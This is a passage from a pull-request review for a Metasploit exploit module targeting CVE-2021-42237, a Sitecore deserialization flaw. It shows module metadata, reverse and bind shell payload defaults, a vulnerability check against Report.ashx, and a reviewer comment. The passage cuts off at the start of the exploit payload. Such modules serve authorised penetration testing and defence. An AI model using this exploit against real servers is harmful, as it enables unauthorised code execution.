modules/exploits/windows/http/cve_2021_42237.rb

```diff
@@ -0,0 +1,212 @@
+          TypeConfuseDelegate gadget chain.
+
+          By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user
+          that IIS is running as, aka NT AUTHORITY\NETWORK SERVICE. Users can then use technique 4
+          of the "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution.
+        },
+        'Author' => [
+          'AssetNote', # Discovery and exploit
+          'gwillcox-r7' # Module
+        ],
+        'References' => [
+          ['CVE', '2021-42237'],
+          ['URL', 'https://blog.assetnote.io/2021/11/02/sitecore-rce/'],
+          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776'],
+        ],
+        'DisclosureDate' => '2021-11-02',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false, # Gains NT AUTHORITY\NETWORK SERVICE privileges. Possible to elevate to SYSTEM but this isn't done automatically.
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_bind_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path of Sitecore', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx')
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    unless res.code == 200 && res.body.include?('Sitecore.Analytics.Reporting.ReportDataSerializer.DeserializeQuery')
+      return CheckCode::Safe('Target is not running Sitecore XP or has patched the vulnerability.')
+    end
+
+    return CheckCode::Appears('Response.ashx is accessible and appears to be deserializing data!')
+  end
+
+  def exploit
+    @xml_payload = %|<parameters>
```

Comment:
You can `def` this so it doesn't clutter up `exploit`.

Reply:
https://github.com/rapid7/metasploit-framework/pull/15858/commits/8d55b16adefbdbd904f25dddf043786b6996507d fixes this